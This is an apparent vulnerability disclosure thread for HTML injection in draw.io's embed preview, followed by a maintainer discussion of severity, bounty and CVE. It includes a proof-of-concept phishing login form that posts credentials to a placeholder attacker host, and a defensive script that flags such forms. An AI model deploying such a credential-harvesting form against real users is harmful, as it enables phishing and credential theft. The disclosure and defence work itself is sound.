Html Injection in jgraph/drawio

Valid

Reported on

May 6th 2022


Description

https://app.diagrams.net/ is vulnerable to HTML injection by uploading an HTML file.

Proof of Concept

  1. Go to https://app.diagrams.net/, create a new HTML file with form fields and add this file to the project.
  2. Now go to File > Embed > HTML and click Create; after that click Preview. Here we will see that all our tags are rendered.
  3. Now click on that form; it will open a new window with that form. Click the print button.
  4. Again click Preview to view the preview of the PDF; now you can enter a username and password and submit it.
  5. The form is working.
  6. Rather than showing the content of the HTML file, the site renders it as HTML, leading to HTML injection. For example, if a file contains an h1 tag it should look like this, <h1>HTML tag</h1>, rather than rendering it.

I have used this code for the login page POC:

  <html>
  <body>
  <h3>Login Form Post Method</h3>
  <div class="main" style="overflow:auto">
  <fieldset class="fieldset">

    <!-- PoC form: posts the entered credentials to the attacker-controlled host -->
    <form action="https://Attacker control Host" method="post">

      <label for="username">Username:</label>
      <input class="userbox" type="text" name="username" required="required" /><br />
      <label for="password">Password:</label>
      <input type="text" name="password" required="required" />
      <input class="button" type="submit" value="submit" />

    </form>

    <p><a href="#">Forget Username?</a>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;|&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<a href="#">Forgot Password?</a></p>
  </fieldset>

  </div>
  <p class="credit">Photo credit: More Than Me</p>

  </body>

  </html>

Impact

An attacker can trick a victim into injecting HTML in his browser.
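Two defender-side checks for the behaviour described in the report above, as an added example that is not code from the report or from draw.io: escaping uploaded file content so it displays as text, and flagging forms whose action posts to another origin. The regex-based form scan and the attacker.example host are simplifications and placeholders assumed for the demonstration.

```javascript
// Added example, not code from the report or from draw.io: two defender-side
// checks for the preview behaviour described in the report above.
// escapeHtml() renders uploaded file content as text, so "<h1>HTML tag</h1>"
// is shown literally instead of being interpreted by the browser.
// crossOriginFormActions() flags <form> tags whose action posts to another
// origin, the pattern the PoC relies on. It is regex-based, a simplification
// for demonstration; production code should use a real HTML parser/sanitizer.
const ESCAPES = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };

function escapeHtml(text) {
  return String(text).replace(/[&<>"']/g, (ch) => ESCAPES[ch]);
}

// Returns the origin of every form whose action resolves to an origin other
// than pageOrigin. Relative and same-origin actions are not reported; an
// unparseable action (like the PoC's placeholder host) is skipped.
function crossOriginFormActions(html, pageOrigin) {
  const found = [];
  const formTag = /<form\b[^>]*>/gi;
  const actionAttr = /\baction\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))/i;
  for (const tag of html.match(formTag) || []) {
    const m = tag.match(actionAttr);
    if (!m) continue;
    const action = m[1] ?? m[2] ?? m[3];
    let target;
    try {
      target = new URL(action, pageOrigin);
    } catch {
      continue;
    }
    if (target.origin !== pageOrigin) found.push(target.origin);
  }
  return found;
}

// Constructed sample resembling the PoC form; attacker.example is a placeholder.
const SAMPLE = `<h3>Login Form Post Method</h3>
<form action="https://attacker.example/collect" method="post">
  <input type="text" name="username" /><input type="text" name="password" />
</form>
<form action="/save" method="post"></form>`;

console.log(escapeHtml("<h1>HTML tag</h1>")); // &lt;h1&gt;HTML tag&lt;/h1&gt;
console.log(crossOriginFormActions(SAMPLE, "https://app.diagrams.net")); // [ 'https://attacker.example' ]
```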

We are processing your report and will contact the jgraph/drawio team within 24 hours. 16 days ago
David Benson
16 days ago

Maintainer


Thanks for the report. What is the version under the help menu at app.diagrams.net?

Would it be possible to format the report by bullet points to list each step at a time please? It's difficult to understand the exact steps in this format. Many thanks.

Distorted_Hacker
16 days ago

Researcher


Hi, it's the latest version, 18.0.1, and you can find a detailed video over here: https://youtu.be/fqk5jSzMRW4

Distorted_Hacker
16 days ago

Researcher


Sorry, I mean here: POC

David Benson
16 days ago

Maintainer


Thanks for the detail. So, the form post is cross domain to any server?

Distorted_Hacker
15 days ago

Researcher


Yes, it sends a request to an attacker-controlled domain.

David Benson
15 days ago

Maintainer


Thanks, we were able to repeat the issue. I agree the issue is valid, though I'm not sure the severity is high. The steps necessary from the user to provoke this are fairly rare for most users to follow.

If someone from huntr reads this, is there a bug taxonomy like https://bugcrowd.com/vulnerability-rating-taxonomy available?

Distorted_Hacker
15 days ago

Researcher


Hi, thanks for your review, but since a user can share his work with other users, an attacker will create a whole template and share it with a user, so the user only has to go to the print page, where an attacker can host a proper phishing page with the POST method enabled with cross domains.

Distorted_Hacker
15 days ago

Researcher


And this is how an attacker can increase the impact of this bug.

Distorted_Hacker
15 days ago

Researcher


Hi, according to Bugcrowd it's a P3 medium severity issue; you can change it to medium, thanks.

Distorted_Hacker
15 days ago

Researcher


An attacker can even share the preview link with the victim, so there are no extra steps the victim has to do.

We have contacted a member of the jgraph/drawio team and are waiting to hear back 15 days ago
David Benson modified the Severity from High (8) to Medium (4.6) 15 days ago
David Benson
15 days ago

Maintainer


I’ve changed availability from high to none, since this doesn’t affect the availability of the system.

In terms of the integrity (impact on the integrity of the exploited system), note that draw.io / diagrams.net doesn’t have any concept of a login. A user isn’t going to think they are logging into the site because there is no login. Why do you believe there is a high effect on the system integrity?

Confidentiality describes the impact on the confidentiality of data processed by the system. There is no direct attack on data, since only the form contents can be extracted. The attack is around whether a user believes this is a real login screen, because they trust the domain. But I don’t see which login the user is being tricked into sending since we don’t have a site login. I think low is more appropriate in this case; it might even be none.

Would you agree with those changes?

David Benson modified the Severity from Medium to Low 15 days ago
David Benson
15 days ago

Maintainer


We've ended up at a low following our process.

I see that moving the issue away from high meant the disclosure bounty went to zero. Our project pays out a minimum of 300USD (for low severity), so we will ensure you receive the 300USD if this is rated as a low.

I'm talking to huntr in the week about the funding process, we'll either make the payment to you via them or direct if that's not possible.

The researcher has received a minor penalty to their credibility for miscalculating the severity: -1
David Benson validated this vulnerability 15 days ago
Distorted_Hacker has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
David Benson confirmed that a fix has been merged on 65f986 15 days ago
The fix bounty has been dropped
Distorted_Hacker
15 days ago

Researcher


Hi, thanks for everything. I just want to know, can you assign a CVE for this?

Jamie Slome
14 days ago

Admin


@davidjgraph - regarding the taxonomy, we do not currently have this available, but I'd love to invite you to create a feature request, if you think it is important :)

Distorted_Hacker
12 days ago

Researcher


@davidjgraph Hi, any update?

David Benson
12 days ago

Maintainer


I am speaking with huntr this week, I won't have any update until after I have spoken with them.

David Benson
10 days ago

Maintainer


The increase to the bounty payment will come from Huntr, once our org is onboarded onto their systems.

Jamie Slome
10 days ago

Admin


Hello all 👋

The researcher bounty for this report has now been bumped from $0 to $300.

Congratulations @jo125ker 🤝

Distorted_Hacker
10 days ago

Researcher


Thanks @davidjgraph @admin

Distorted_Hacker
8 days ago

Researcher


Hi @admin, can you please assign a CVE?

Jamie Slome
7 days ago

Admin


@davidjgraph - are you happy for us to proceed with assigning and publishing a CVE for this report?

David Benson
7 days ago

Maintainer


@jamieslome Sure, I don't see any reason to not assign a CVE, unless you have a minimum severity. Is the report purely based on the original post?

Jamie Slome
6 days ago

Admin


@davidjgraph - we do not currently auto-assign CVEs for None or Low severities. However, if you could provide us with a CVSS vector string, we can go ahead and publish a CVE for this report 👍

David Benson
6 days ago

Maintainer


OK, didn't see it was a low. Why a CVE for a low @gaurav-g2 ?
